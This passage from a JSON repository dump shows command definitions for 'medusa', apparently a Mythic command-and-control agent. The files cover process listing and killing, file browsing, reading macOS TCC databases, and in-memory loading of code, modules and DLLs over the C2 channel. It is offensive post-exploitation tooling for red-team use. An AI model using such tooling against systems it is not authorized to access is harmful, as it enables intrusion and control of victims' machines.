    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass JobsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass JobsCommand(CommandBase):\n    cmd = \"jobs\"\n    needs_admin = False\n    help_cmd = \"jobs\"\n    description = \"List running jobs\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = JobsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"jobs\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/kill.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json, re\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass KillArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                description=\"ID of Process to Terminate\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"process_id\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass KillCommand(CommandBase):\n    cmd = \"kill\"\n    needs_admin = False\n    help_cmd = \"kill process_id\"\n    description = \"Terminate process by ID\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = [ \"process_browser:kill\" ] \n    argument_class = KillArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = f\"Terminating process with PID: \" + str(task.args.get_arg(\"process_id\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_apps.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\nclass ListAppsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ListAppsCommand(CommandBase):\n    cmd = \"list_apps\"\n    needs_admin = False\n    help_cmd = \"list_apps\"\n    description = \"This lists all running applications\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = ListAppsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"list_apps\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        resp = await MythicRPC().execute(\"create_artifact\", task_id=task.id,\n            artifact=\"NSWorkspace.sharedWorkspace().runningApplications()\",\n            artifact_type=\"API Called\",\n        )\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_dlls.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass ListDllsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                default_value=0,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False,\n                )],\n                description=\"ID of process to list loaded DLLs of, can be 0 for local process\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                self.add_arg(\"process_id\", temp_json[\"process_id\"])\n            else:\n                self.add_arg(\"process_id\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass ListDllsCommand(CommandBase):\n    cmd = \"list_dlls\"\n    needs_admin = False\n    help_cmd = \"list_dlls [process_id]\"\n    description = \"List DLLs loaded in current or specified process\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    supported_ui_features = [\"process_dlls:list\"]\n\n    argument_class = ListDllsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"list_dlls\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        process_id = task.args.get_arg(\"process_id\")\n        if process_id == 0:\n            task.display_params = f\"Listing DLLs loaded in current process\"\n        else:\n            task.display_params = f\"Listing DLLs loaded in process with PID: {process_id}\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_modules.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass ListModulesArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Provide full file listing for a loaded module.\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"module_name\", self.command_line)\n\nclass ListModulesCommand(CommandBase):\n    cmd = \"list_modules\"\n    needs_admin = False\n    help_cmd = \"list_modules [module_name]\"\n    description = \"List Python modules loaded in-memory, or a full file listing for a specific module\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = ListModulesArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = f\"Listing modules loaded in-memory\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_tcc.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass ListTccArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"db\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                default_value=\"/Library/Application Support/com.apple.TCC/TCC.db\",\n                description=\"Path to TCC database\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                self.add_arg(\"db\", temp_json[\"db\"])\n            else:\n                self.add_arg(\"db\", self.command_line)\n        else:\n            self.add_arg(\"db\", \"/Library/Application Support/com.apple.TCC/TCC.db\")\n        self.add_arg(\"tcc\", True, type=ParameterType.Boolean)\n\nclass ListTccCommand(CommandBase):\n    cmd = \"list_tcc\"\n    needs_admin = False\n    help_cmd = \"list_tcc [db_path]\"\n    description = \"Lists entries in TCC database (requires Full Disk Access)\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = ListTccArguments\n    browser_script = BrowserScript(script_name=\"tcc\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Listing TCC database entries from \" + task.args.get_arg(\"db\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, base64, os\n\nclass LoadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\",\n                type=ParameterType.ChooseOne,\n                description=\"Command to load into the agent\",\n                dynamic_query_function=self.get_commands\n            ),\n        ]\n\n    # async def get_commands(self, callback: dict) -> [str]:\n    async def get_commands(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:\n        fileResponse = PTRPCDynamicQueryFunctionMessageResponse(Success=False)\n\n        callbacks = await SendMythicRPCCallbackSearch(MythicRPCCallbackSearchMessage(\n            SearchCallbackID=inputMsg.Callback,\n            AgentCallbackID=inputMsg.Callback\n        ))\n        \n        payload_os = \"\"\n        python_version = \"\"\n\n        if callbacks.Success:\n            payloads = await SendMythicRPCPayloadSearch(MythicRPCPayloadSearchMessage(\n                CallbackID=inputMsg.Callback, PayloadUUID=callbacks.Results[0].RegisteredPayloadUUID\n            ))\n            if payloads.Success:\n                payload_os = payloads.Payloads[0].SelectedOS\n                python_version = [param.Value for param in payloads.Payloads[0].BuildParameters if param.Name == 'python_version'][0]\n            else:\n                raise Exception(f\"Failed to get payload: {payloads.Error}\")\n        else:\n            raise Exception(f\"Failed to get callback: {callbacks.Error}\")\n        \n        all_cmds = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(\n            SearchPayloadTypeName=\"medusa\",\n            SearchOS=payload_os,\n            SearchAttributes={\n                \"supported_python_versions\": [python_version],\n            },\n        ))\n\n        loaded_cmds = await SendMythicRPCCallbackSearchCommand(MythicRPCCallbackSearchCommandMessage(\n            CallbackID=inputMsg.Callback\n        ))\n\n        if not all_cmds.Success:\n            raise Exception(\"Failed to get commands for medusa agent: {}\".format(all_cmds.Error))\n        if not loaded_cmds.Success:\n            raise Exception(\"Failed to fetch loaded commands from callback {}: {}\".format(inputMsg.Callback, loaded_cmds.Error))\n\n        all_cmds_names = set([r.Name for r in all_cmds.Commands])\n        loaded_cmds_names = set([r.Name for r in loaded_cmds.Commands])\n        \n        logger.info(all_cmds_names)\n        logger.info(loaded_cmds_names)\n    \n        diff = all_cmds_names.difference(loaded_cmds_names)\n        fileResponse.Success = True\n        fileResponse.Choices = sorted(diff)\n        return fileResponse\n\n    \n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            self.add_arg(\"command\", self.command_line)\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass LoadCommand(CommandBase):\n    cmd = \"load\"\n    needs_admin = False\n    help_cmd = \"load\"\n    description = \"This loads new functions into memory via the C2 channel.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1030\", \"T1129\"]\n    argument_class = LoadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n\n        command = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(\n            SearchPayloadTypeName=\"medusa\",\n            SearchCommandNames=[taskData.args.get_arg(\"command\")],\n            SearchOS=taskData.Payload.OS\n        ))\n\n        build_params = taskData.BuildParameters\n        for build_param in build_params:\n            if build_param.Name == 'python_version':\n                py_ver = build_param.Value\n        \n        py_suffix = \".py2\" if py_ver == \"Python 2.7\" else \".py3\"\n\n        cmd_code = \"\"\n        if command.Success:\n            loadingCommand = \"\"\n            for cmd in command.Commands:\n                try:\n                    path = \"\"\n                    for func in os.listdir(self.agent_code_path):\n                        if (func.endswith(py_suffix) or func.endswith(\".py\")) and cmd.Name == func.split(\".\")[0]:\n                            path = func\n                            break\n                    code_path = self.agent_code_path / \"{}\".format(path)\n                    cmd_code = open(code_path, \"r\").read() + \"\\n\"\n                    loadingCommand = cmd.Name\n                except Exception as e:\n                    await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                        TaskID=taskData.Task.ID,\n                        Response=f\"Failed to find code for {cmd.Name}, skipping it\\n\".encode()\n                    ))\n\n            if cmd_code != \"\":\n                resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Comment=f\"Loading the following command: {loadingCommand}\\n\",\n                    FileContents=cmd_code.encode(),\n                    Filename=f\"medusa load command\",\n                    DeleteAfterFetch=True\n                ))\n                if resp.Success:\n                    taskData.args.add_arg(\"file_id\", resp.AgentFileId)\n                    response.DisplayParams = f\"command: {loadingCommand}\"\n                else:\n                    raise Exception(\"Failed to register file: \" + resp.Error)\n            else:\n                response.Completed = True\n                response.DisplayParams = f\"no command\"\n                return response\n        else:\n            raise Exception(\"Failed to fetch commands from Mythic: \" + commands.Error)\n        \n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_dll.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass LoadDllArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"dllpath\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Location of on-disk DLL\",\n            ),\n            CommandParameter(\n                name=\"dllexport\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Export of target DLL\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"dllpath\", pieces[0])\n                self.add_arg(\"dllexport\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass LoadDllCommand(CommandBase):\n    cmd = \"load_dll\"\n    needs_admin = False\n    help_cmd = \"load_dll dll_path dll_export\"\n    description = \"Load DLL from disk\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1059.006\", \"T1127\" ]\n    argument_class = LoadDllArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.Windows],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Executing \" + str(task.args.get_arg(\"dllpath\")) + \" with export '\"\n        task.display_params += str(task.args.get_arg(\"dllexport\")) + \"'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_module.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass LoadModuleArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", type=ParameterType.File, description=\"Zipped library to upload\"\n            ),\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                description=\"Name of module to load, e.g. cryptography\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass LoadModuleCommand(CommandBase):\n    cmd = \"load_module\"\n    needs_admin = False\n    help_cmd = \"load_module\"\n    description = (\n        \"Upload a python library and load it in-memory\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = LoadModuleArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        try:\n            file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n            if file_resp.status == MythicRPCStatus.Success:\n                if len(file_resp.response) > 0:\n                    task.display_params = f\"Loading {task.args.get_arg('module_name')} module into memory\"\n                elif len(file_resp.response) == 0:\n                    raise Exception(\"Failed to find the named file. Have you uploaded it before? Did it get deleted?\")\n            else:\n                raise Exception(\"Error from Mythic RPC: \" + str(file_resp.error))\n        \n            file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for load_module\")\n        \n        \n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + str(e))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_script.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass LoadScriptArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"script to load\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass LoadScriptCommand(CommandBase):\n    cmd = \"load_script\"\n    needs_admin = False\n    help_cmd = \"load_script\"\n    description = (\n        \"Load a Python script into the agent. Functions in the script can be added to the agent class with setattr() and called with the eval_code function if needed\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = LoadScriptArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n        if file_resp.status == MythicStatus.Success:\n            original_file_name = file_resp.response[0][\"filename\"]\n            task.display_params = f\"Loading script: {original_file_name}\"\n        else:\n            raise Exception(\"Failed to register file: \" + file_resp.error)\n        \n        file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for load_script\")\n        \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ls.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass LsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Path of file or folder on the current system to list\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                if \"host\" in temp_json:\n                    self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n                    self.add_arg(\"file_browser\", True, type=ParameterType.Boolean)\n                else:\n                    self.add_arg(\"path\", temp_json[\"path\"])\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            self.add_arg(\"path\", \".\")\n\nclass LsCommand(CommandBase):\n    cmd = \"ls\"\n    needs_admin = False\n    help_cmd = \"ls [/path/to/file]\"\n    description = \"Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    supported_ui_features = [\"file_browser:list\"]\n    is_file_browse = True\n    argument_class = LsArguments\n    browser_script = BrowserScript(script_name=\"ls\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.has_arg(\"file_browser\") and task.args.get_arg(\"file_browser\"):\n            host = task.callback.host\n            task.display_params = host + \":\" + task.args.get_arg(\"path\")\n        else:\n            task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/mv.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass MvArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"destination\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Location for moved file or folder\",\n            ),\n            CommandParameter(\n                name=\"source\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Path to file or folder for moving\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"source\", pieces[0])\n                self.add_arg(\"destination\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass MvCommand(CommandBase):\n    cmd = \"mv\"\n    needs_admin = False\n    help_cmd = \"mv source destination\"\n    description = \"Move file or folder to destination\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = MvArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Moving \" + str(task.args.get_arg(\"source\")) + \" to \"\n        task.display_params += str(task.args.get_arg(\"destination\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/pip_freeze.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass PipFreezeArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PipFreezeCommand(CommandBase):\n    cmd = \"pip_freeze\"\n    needs_admin = False\n    help_cmd = \"pip_freeze\"\n    description = \"This programmatically lists all installed modules.\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = PipFreezeArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ps.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass PsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PsCommand(CommandBase):\n    cmd = \"ps\"\n    needs_admin = False\n    help_cmd = \"ps\"\n    description = \"Get limited process listing\"\n    version = 2\n    author = \"@ajpc500\"\n    attackmapping = [\"T1106\"]\n    supported_ui_features = [\"process_browser:list\"]\n    argument_class = PsArguments\n    browser_script = BrowserScript(script_name=\"ps\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[ \"Python 2.7\", \"Python 3.8\" ],\n        supported_os=[ SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Getting limited process listing\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ps_full.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass PsFullArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PsFullCommand(CommandBase):\n    cmd = \"ps_full\"\n    needs_admin = False\n    help_cmd = \"ps_full\"\n    description = \"Get full process listing.\"\n    version = 2\n    author = \"@ajpc500\"\n    attackmapping = [\"T1106\"]\n    supported_ui_features = [\"process_browser:list\"]\n    argument_class = PsFullArguments\n    browser_script = BrowserScript(script_name=\"ps_full\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[ \"Python 3.8\" ],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Getting full process listing\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/rm.py",
